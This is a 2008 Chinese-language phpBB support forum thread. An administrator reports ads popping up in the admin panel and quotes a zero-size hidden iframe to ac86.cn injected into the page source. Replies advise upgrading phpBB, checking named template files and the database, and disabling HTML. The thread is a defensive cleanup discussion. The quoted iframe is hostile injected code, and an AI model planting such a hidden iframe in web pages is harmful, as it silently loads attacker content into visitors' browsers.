1 頁 (共 1 頁)

[問題] 被植入奇怪的程式碼

發表於 : 2008-06-30 04:02
darkakia
最近,我的phpbb論壇遇到了一些麻煩,
可能需要請教各位前輩該怎麼解決...

我把我的論壇搬到24cc空間之後,
論壇開始有很多機器人來註冊,
這一陣子我更發現,每次進入後台時,都會莫名其妙跑出廣告視窗,都被我的firefox給擋了下來。

非常奇怪的是,論壇本身外面的網頁都沒有看到這些廣告視窗,
進入後台就會有,
一直都是「ac86.cn」的廣告。

我一直以為是我電腦中了木馬,
但,怎麼掃都掃不出來。

我這幾天實在受不了了直接打開後台,然後用firefox的檢視原始碼看:
卻意外地看到了多出了這行:

代碼: 選擇全部

<iframe src=http://www.ac86.cn/66/index.htm width=0 height=0></iframe>
這非常明顯不會是我自己寫的東西。

我實在是不知道該怎麼辦?

這廣告究竟是寫在網頁碼裡?我只要回去用dreamwaver抓出這行來殺掉就好?
還是已經被入侵到mysql資料庫了?

我該怎麼辦才好?

----

另,我抓到這段廣告碼的地點是後台右邊主頁的原始碼,
我想順便請教各位前輩,這一段原始碼對應的是哪一個檔案?
我想試試看直接修改那個檔案來救救看...

代碼: 選擇全部

</style>
<title>《翠綠昂揚論壇--萊柏利圖書館市》 - </title>
</head>
<body bgcolor="#E5E5E5" text="#062B1A" link="#006699" vlink="#5493B4">

<a name="top"></a>

<iframe src=http://www.ac86.cn/66/index.htm width=0 height=0></iframe>

<h1>歡迎光臨 phpBB 2 系統管理控制台</h1>

<p>感謝您選擇 phpBB 2 作為您的討論區系統. 在這個版面裡, 您可以透過一些統計資料快速的檢視您的討論區系統. 您可以藉由點選控制台左方的<u>控制台首頁</u>連結回到這一頁. 要回到您的討論區首頁, 請點選在控制台左上方的 phpBB 標誌圖示. 在這個畫面左方的其他連結, 將允許您控制討論區系統的所有管理選項, 而每個版面裡也會有各項功能的使用解說.</p>

<h1>討論區統計資料</h1>

<table width="100%" cellpadding="4" cellspacing="1" border="0" class="forumline">
  <tr>
	<th width="25%" nowrap="nowrap" height="25" class="thCornerL">統計資料</th>

	<th width="25%" height="25" class="thTop">數值</th>
	<th width="25%" nowrap="nowrap" height="25" class="thTop">統計資料</th>
	<th width="25%" height="25" class="thCornerR">數值</th>
  </tr>
  <tr>
	<td class="row1" nowrap="nowrap">文章總數:</td>
	<td class="row2"><b>12856</b></td>

	<td class="row1" nowrap="nowrap">平均每天發表的文章總數:</td>
	<td class="row2"><b>7.24</b></td>
  </tr>
  <tr>
	<td class="row1" nowrap="nowrap">主題總數:</td>
	<td class="row2"><b>4204</b></td>
	<td class="row1" nowrap="nowrap">平均每天發表的主題總數:</td>

	<td class="row2"><b>2.37</b></td>
  </tr>
  <tr>
	<td class="row1" nowrap="nowrap">註冊會員總數:</td>
	<td class="row2"><b>386</b></td>
	<td class="row1" nowrap="nowrap">平均每天註冊的會員總數:</td>
	<td class="row2"><b>0.22</b></td>
----

●主機作業系統:Windows Xp
●我的上網方式:Seednet ADSL
●我使用的瀏覽器:firefox3
●我安裝的程式:Apache + php + MySql 4.1.22(我架在24cc的付費空間上,剩下的資訊其實我不太清楚)
●我的 phpBB 版本:phpBB 2.0.21
●我的 domain (網域名稱) : v-soar.com
●我的 phpBB 連結網址: http://v-soar.com2/phpbb/

Re: [問題] 被植入奇怪的程式碼

發表於 : 2008-06-30 10:35
yehrussell
phpBB 2.0.23 安全性修正版本釋出
http://phpbb-tw.net/phpbb/viewtopic.php?f=2&t=50362

phpBB 2.0.23 版本 都在2008-02-18 釋出
您的phpBB 版本:phpBB 2.0.21.....
安全性質得考慮
盡快更新版本吧
以免被駭

Re: [問題] 被植入奇怪的程式碼

發表於 : 2008-06-30 14:34
SCR
請先到資料庫裡面找看有無被植入惡意的網址,把它給刪除掉後再更新你的 PHPBB 版本吧.
http://phpbb-tw.net/phpbb/viewtopic.php?f=2&t=49766 參考看看!

Re: [問題] 被植入奇怪的程式碼

發表於 : 2008-06-30 15:32
心靈捕手
SCR 寫:請先到資料庫裡面找看有無被植入惡意的網址,把它給刪除掉後再更新你的 PHPBB 版本吧.
http://phpbb-tw.net/phpbb/viewtopic.php?f=2&t=49766 參考看看!
或許, 可以先檢視下列檔案, 是否有被植入該網址.
admin/index.php
admiin/page_header_admin.php
template/YOUR_THEME/admin/index_body.tpl
template/YOUR_THEME/admin/page_header.tpl

也就是說, 如果上述檔案無誤的話, 那麼該網址肯定是被寫入資料庫了.

Re: [問題] 被植入奇怪的程式碼

發表於 : 2008-06-30 16:28
小竹子
有關閉文章使用 HTML 功能嗎?

Re: [問題] 被植入奇怪的程式碼

發表於 : 2008-10-12 11:00
darkakia
感謝各位的回應,很抱歉這麼晚才來回文。 >///<

七月初,我已經把所有整個論壇的.php跟.htm檔全部打開,用dreamwaver下去搜尋取代這個廣告碼,然後重新傳上伺服器之後,問題似乎就解決了,至今三個多月沒有復發。

我剛剛看到了心靈捕手大的回文,我有進去資料庫看了一下,也沒有發現被改寫什麼看起來像是跟這個廣告碼有關的東西。(至少我沒看出來)

竹貓大建議的關閉HTM碼,我剛剛也去後台關掉了,以前我就關掉過,這次應該是永遠不會再開了。@@


但是,現在有了個麻煩,就是2.0.21升級到2.0.23的安全修正安裝檔,我在官方網站上找不到了,我到處搜尋也一直找不到…Orz
之前剛推出23時,我下載來備份等著要安裝的檔案我也弄丟了…

不知道有哪位前輩知道哪裡可以下載得到嗎?@@
我有一些簡單的小外掛,也不是很清楚我應該下載什麼樣的版本,還請指教…Q_Q

Re: [問題] 被植入奇怪的程式碼

發表於 : 2008-10-12 16:39
心靈捕手
darkakia 寫:
但是,現在有了個麻煩,就是2.0.21升級到2.0.23的安全修正安裝檔,我在官方網站上找不到了,我到處搜尋也一直找不到…Orz
之前剛推出23時,我下載來備份等著要安裝的檔案我也弄丟了…

不知道有哪位前輩知道哪裡可以下載得到嗎?@@
我有一些簡單的小外掛,也不是很清楚我應該下載什麼樣的版本,還請指教…Q_Q
http://phpbb-tw.net/phpbb/viewtopic.php ... 36#p268136
http://phpbb-tw.net/phpbb/viewtopic.php ... 90#p263690